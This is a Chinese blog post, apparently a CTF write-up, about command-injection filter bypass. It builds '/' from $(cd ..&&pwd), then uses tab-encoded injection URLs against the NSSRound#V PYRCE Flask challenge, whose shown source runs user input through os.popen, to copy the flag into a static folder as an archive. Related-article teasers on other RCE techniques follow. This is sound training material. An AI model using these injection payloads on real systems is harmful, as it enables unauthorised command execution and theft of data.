利用pwd构造rce

最新推荐文章于 2025-04-08 12:38:37 发布
最新推荐文章于 2025-04-08 12:38:37 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 打靶笔记 文章标签: flask python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/127731956
版权

标题不会取,大概就是这个意思。

一、原理

如果在ctf中,我们传入的值被过滤,但是如果可以绕过就能造成rce,那么如何绕过 / 这个符号呢

首先在Linux中,我们随便创建几个文件夹,

 在flag.txt中随便写入flag,假设这是我们要找的flag

再在/root/下创建一个空文件a.txt

我们可以利用

cp -f flag.txt $(cd ..&&cd ..&&cd ..&&pwd)root$(cd ..&&cd ..&&cd ..&&pwd)a.txt

来将flag.txt文件内容覆盖a.txt,那么我们就可以通过访问a.txt来获得flag了

解释一下:

1、cp -f:这个命令是强制将前面文件内容覆盖到后面文件中

2、$(cd ..&&cd ..&&cd ..&&pwd):这个是为了获取到 / 这个符号

pwd命令功能是显示用户当前所处的工作目录,而cd ..是切换到上一级目录,如果不知道要用几次cd ..,可以多写几个,保证切换到根目录

二、例题 

 [NSSRound#V Team]PYRCE

进入题目,拿到源码

from flask import Flask, request, make_response
import uuid
import os

# flag in /flag
app = Flask(__name__)

def waf(rce):
    black_list = '01233456789un/|{}*!;@#\n`~\'\"><=+-_ '
    for black in black_list:
        if black in rce:
            return False
    return True

@app.route('/', methods=['GET'])
def index():
    if request.args.get("Ňśś"):
        nss = request.args.get("Ňśś")
        if waf(nss):
            os.popen(nss)
        else:
            return "waf"
    return "/source"


@app.route('/source', methods=['GET'])
def source():
    src = open("app.py", 'rb').read()
    return src

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=False, port=8080)

传参,过waf,这里的waf过滤了很多东西,就可以用我们上面的那个方法来进行

已知是一个flask框架,其静态文件都在static中,可以直接访问获取

这里可以先试试 mkdir static 创建一个静态访问的文档

接着使用 cd … 放回上一级目录,使用 cp 命令将 flag移动到static目录中

其中空格用%09来绕过。

另一种方法,就是把flag压缩为一个tar.gz文件,然后下载

http://IP/?Ňśś=mkdir%09static

http://IP/?Ňśś=tar%09czf%09static$(cd%09..%26%26cd%09..%26%26cd%09..%26%26pwd)flag.tar.gz%09$(cd%09..%26%26cd%09..%26%26cd%09..%26%26pwd)flag

http://IP/static/flag.tar.gz

Apache Struts2-001 RCE 含漏洞利用脚本
乌云__SS的博客
11-09 354
0x01漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 0x02影响版本 Struts 2.0.0 - Struts 2.0.8 0x03漏洞复现 首先测试漏洞 发现...
【Java代码审计】RCE
大河之犬的博客
12-21 1774
命令注入(RCE)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。
# NSSCTF Round#V
as you know, nlp is fantasitc!
08-29 1229
这次比赛的题目逻辑不是很难,但是需要自己去思考怎么如何利用,通过这样的题目可以去训练利用漏洞的思维,所以花了很多时间去复现(ps:naive calculator利用eval反弹shell没成功,后面有时间再研究)...
NSSCTF web刷题记录3
rev1ve的博客
10-28 974
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
[NSSRound#V Team]untouchable
2302_79135465的博客
04-22 299
嗯,在遇到‘aaaaaaaaaaa’类的字符串打开汇编窗口看看,一些dq(双字节数据(8字节))转字符,可能会有信息。AnnivNSSFirst,key是NSSFirst,出flag。扣1送flag,直接动调,后面要输入key。发现是rc4,但是不知道秘钥,继续跟,去。看看,发现有nssfirst的字样。光想着绕过了,没仔细看,唉。进入这个函数,看起来像RC4。
[NSSRound#6 Team]check(Revenge)
rev1ve的博客
10-31 450
Python 中 tarfile 模块中的extract、extractFile和extractall 函数中的目录遍历漏洞 允许 用户协助的远程攻击者通过 TAR 存档文件名中的…我们可以看到debug是开启的,那么当文件发生修改时会自动重载,可以直接覆盖main.py。一般默认 flask.app 为 Flask,所以主要获取剩下的4个变量即可。liunx下PIN码中的username 可以从 /etc/passwd 中读取。(main.py可以猜,路径可以慢慢试出来)的文件名时可以实现文件覆盖漏洞。
waf绕过
2301_76206334的博客
04-07 262
用burp抓这个 tj.php数据包 上面的代码是tj.php的内容 其中会将phpinfo()函数写入qing.php文件也就是上传成功后 我们可以访问的文件。(1)简单的黑名单绕过 改后缀名为.php3 .php5 .phtml .phphpp。设置好之后 我们开始攻击 先看看 效果怎么样 一般都是先上传到服务器 然后立马被清除。因为要条件竞争 所以我们一边上传 一边访问 抓取 访问tj.php时的包。接着我们在upload目录下成功发现 qing.php文件 说明条件竞争成功。
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1333
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
RCE:命令注入 过滤空格 远程代码执行 php://input 读取源代码
qq_69100706的博客
08-12 952
命令注入是一种常见的技巧,用于实现远程代码执行(RCE)。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中,如果用户输入未被妥善清理或验证,攻击者可以注入额外的命令,从而执行任意代码。
Thinkphp5 RCE总结 _ ChaBug安全1
08-03
ThinkPHP5 Remote Code Execution(RCE)漏洞是指攻击者可以利用该框架的某些功能执行远程代码,从而对系统造成严重影响的安全问题。这些漏洞主要出现在ThinkPHP 5.0和5.1两个大版本中,由于触发点和版本的不同,...
CTF Linux 命令执行常规bypass
weixin_30892889的博客
09-11 1652
截断符 常见的RCE的形式是给一个ping的命令执行,只需要输入ip,然后返回ping ip的输出信息 常见的用来截断的符号 & && ; | || windows或linux下: command1 && command2 先执行command1后执行command2 command1 | command2 只执行c...
利用持久变量绕过长度限制 + unicode特性绕过waf-- xyctf 出题人已疯12 复现
最新发布
weixin_59166557的博客
04-08 1287
这成功了,但是题目无回显,直接运行短小的有效负载并不可能,我或许找到一种方式绕过小于25的限制。成功,服务器端代码与本地无任何差异,但是这似乎只能读取当前目录文件,读取绝对路径时会被禁止。我们最大的有效负载长度为24,减去换行与百分号为22,我有办法使用22个字符执行命令吗。我该如何读取根目录的flag呢,我现应该分析库的代码来寻找现成的open并想办法调用。库对目录穿越的防护很完善,我无法再想到任何方式绕过,或许是原型污染?但是其命名空间均是独立的,我没有办法在模板内污染外围变量。
[NSSRound#V Team]Shatter_Time
liaochonxiang的博客
05-30 274
main2函数:为解密函数,前部分取的是随机数的地址,所以只要条件满足,无论条件为何值都会输出前部分flag。动调,运行到此处进行对存储随机数的地方进行修改,将值改为正确的值。不过看程序的运行情况,一般情况下返回0,使循环一直继续/将光标移到t=clock()处,按tab键,下断点。main5函数:将获取的随机数进行加密对比。发现main5是真正的主函数,主要逻辑在里面。然后只要在存储随机数的地方修改随机数值。后部分的flag需要满足条件的随机数。接下来求出正确的随机数。进行运行,得到flag。
[NSSRound#6 Team]Web学习
Aiwin的博客
01-16 1382
[NSSRound#6 Team]中CVE-2007-4559与Flask开启debug后PIN码的计算
[NSSRound#11] 密码学个人赛
weixin_52640415的博客
04-17 1519
NSSCTF Round#11 密码学个人赛 RSA共模攻击 RSA低加密指指数广播攻击 N = m*a^2 + n*b^2的大数分解 RABIN NTRU
[NSSRound#4] 复现
qq_61768489的博客
08-12 1517
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
CTF线下赛WAF【参考,自行修改】
热门推荐
Sp4rkW的博客
10-05 1万+
原文链接:http://www.cnblogs.com/Oran9e/p/7233478.html 作者:Oran9e 期待已久的WAF &lt;?php error_reporting(0); define('LOG_FILENAME','log.txt'); function waf() { if (!function_exis...
CTFweb中常用套路
The Road Of Sec
05-10 1万+
web狗的多种套路!!!
利用pwd获得当前所在目录并存储在一个变量中
05-30
好的,可以使用以下命令来实现: ``` current_dir=$(pwd) ``` 这个命令会将 `pwd` 命令输出的当前目录保存在 `current_dir` 变量中。你可以在后续的脚本中使用这个变量来引用当前目录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值